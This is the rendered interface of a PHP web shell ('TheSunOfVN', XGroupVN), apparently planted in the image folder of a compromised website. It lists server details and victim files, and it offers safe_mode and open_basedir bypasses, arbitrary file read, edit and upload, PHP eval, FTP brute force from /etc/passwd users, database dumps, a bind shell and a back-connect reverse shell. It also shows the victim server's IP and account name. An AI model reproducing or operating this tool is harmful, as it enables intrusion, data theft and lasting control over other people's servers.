..:: TheSunOfVN ::..

08-02-2012 08:50:55 [ phpinfo ] [ php.ini ] [ Cpu ] [ Memory ] [ Users ] [ Brute ] [ ln -s all ] [ Tools ] [ Mass Code Injection ] [ tmp ]
safe_mode: ON Open_Basedir: NONE Safe_Exec_Dir: /usr/local/php/bin Safe_Gid: OFF Safe_Include_Dir: NONE Sql.safe_mode: OFF
PHP version: 5.2.17 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : system, exec, shell_exec, passthru, pcntl_exec, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, escapeshellcmd, escapeshellarg, dl, show_source,ini_alter, virtual, openlog, mail, symlink
Downloaders: fopen
Free space : 181.23 GB Total space: 264.96 GB
Server IP: [ 112.78.2.10 ] -- Your IP: [ 38.107.179.236 ]

uname -a :
sysctl :
$OSTYPE :
Server :
id :
pwd :

Linux mb2d10.vdrs.net 2.6.18-274.3.1.el5 #1 SMP Tue Sep 6 20:13:52 EDT 2011 x86_64
-

Apache
uid=724 ( otovnvn ) gid=724 ( otovnvn )
/home/otovnvn/public_html/images/logo ( drwx--x--x )

Executed command: safe_dir

59574421 drwx--x--x 2 otovnvn otovnvn 4096 20.05.2010 11:54 backup 59574428 -rw-r--r-- 1 otovnvn otovnvn 90 20.05.2010 11:49 .htaccess 59574431 -r-------- 1 otovnvn otovnvn 55232 20.05.2010 11:48 100520InfoTD.php 59574415 -rw-r--r-- 1 otovnvn otovnvn 2939 01.11.2009 12:22 090611images.jpg 59574425 -r-------- 1 otovnvn otovnvn 35137 20.05.2010 11:54 DuinfoTD.php 59574432 -rw-r--r-- 1 otovnvn otovnvn 16824 31.12.2010 15:46 error_log 59574435 -rw-r--r-- 1 otovnvn otovnvn 25219 01.11.2009 12:22 090611Adi.jpg 59574418 -rw-r--r-- 1 otovnvn otovnvn 4124 01.11.2009 12:23 090611toyota.jpg 59574436 -rw-r--r-- 1 otovnvn otovnvn 24446 01.11.2009 12:22 090611for.jpg 59574414 -rw-r--r-- 1 otovnvn otovnvn 17426 01.11.2009 12:23 090703logo.jpg 59574419 -r-------- 1 otovnvn otovnvn 229 20.05.2010 11:49 ini.php 59574426 -rw-r--r-- 1 otovnvn otovnvn 4214 04.01.2011 16:27 110104Huyndai.jpg 59574413 -rw-r--r-- 1 otovnvn otovnvn 21545 01.11.2009 12:23 090611lex.jpg 59574429 -rw-r--r-- 1 otovnvn otovnvn 39491 01.11.2009 12:23 090611oto3.jpg 59574430 -rw-r--r-- 1 otovnvn otovnvn 18602 01.11.2009 12:23 090611Mec.jpg u--------- 0 root root 01.01.1970 07:00 345.txt 59574416 -rw-r--r-- 1 otovnvn otovnvn 11808 01.11.2009 12:23 090703logohai.png 59574417 -rw-r--r-- 1 otovnvn otovnvn 2437 01.11.2009 12:23 090623Nissan_logo.jpg 59574420 -rw-r--r-- 1 otovnvn otovnvn 2812 01.11.2009 12:22 090611bmw.jpg 59574427 -rw-r--r-- 1 otovnvn otovnvn 35 20.05.2010 11:49 php.ini 59574433 drwx--x--x 2 otovnvn otovnvn 4096 29.12.2010 18:25 file:

:: Work in safe_mode ::

Work directory 4

:: read file from PLUGIN ::

where file in server 4

:: Create/Delete File/Dir ::

name 4

:: Chown/Chgrp/Chmod ::

Command 4

param1 4 param2 4

:: Edit files ::

File for edit 4

:: read dir from vul reg_glob ::

read dir 4

:: read dir from vul root ::

read dir 4

:: read file from vul copy() ::

where file in server 4

:: read file from vul ini_restore() ::

where file in server 4

:: Bypass php 5.2.6 ::

Cat file 4

:: Bypass php 5.2.9 ::

Cat file 4

:: PHP Bypass ::

Read File

File : 4

View Dir

Dir : 4

:: DeZender ::

Cat file 4

:: Aliases ::

Select alias 4

:: Find text in files ::

Find text 4
In dirs 4	*
Only in files 4	*

:: Test bypass open_basedir with cURL functions ::

Cat file 4

:: read file from vul curl() ::

where file in server 4

:: Eval PHP code ::

:: Upload files on server ::

Local file 4
Local file 4
Local file 4

Local file 4
Local file 4

:: Download files from server ::

file 4
Archivation 4	without archivation zip gzip

:: FTP-bruteforce ::

FTP-server:port 4
	* use username from /etc/passwd for ftp login and password ( Users list )
	Use reverse (user -> resu) login for password

:: Databases ::

Dump database table

Type 4
SQL-Server : Port 4	:
Login : Password 4	:
Db . Table 4	.
Save dump in file 4

Run SQL query

Type 4
SQL-Server : Port 4	:
Login : Password 4	:
Database 4
SQL query 4

:: Net ::

Bind port to /bin/bash

Port 4
Password for access 4
Use 4

back-connect

IP 4
Port 4
Use 4

:: safe_mode off ::

Close safe_mode with php.ini
Close security_mod with .htaccess
write ini.php file to close safe_mode with ini_restore vul

Use 4
Use 4
Use 4

_____TheSunOfVN_____
----------XGroupVN----------

Generation time: 0.09 seconds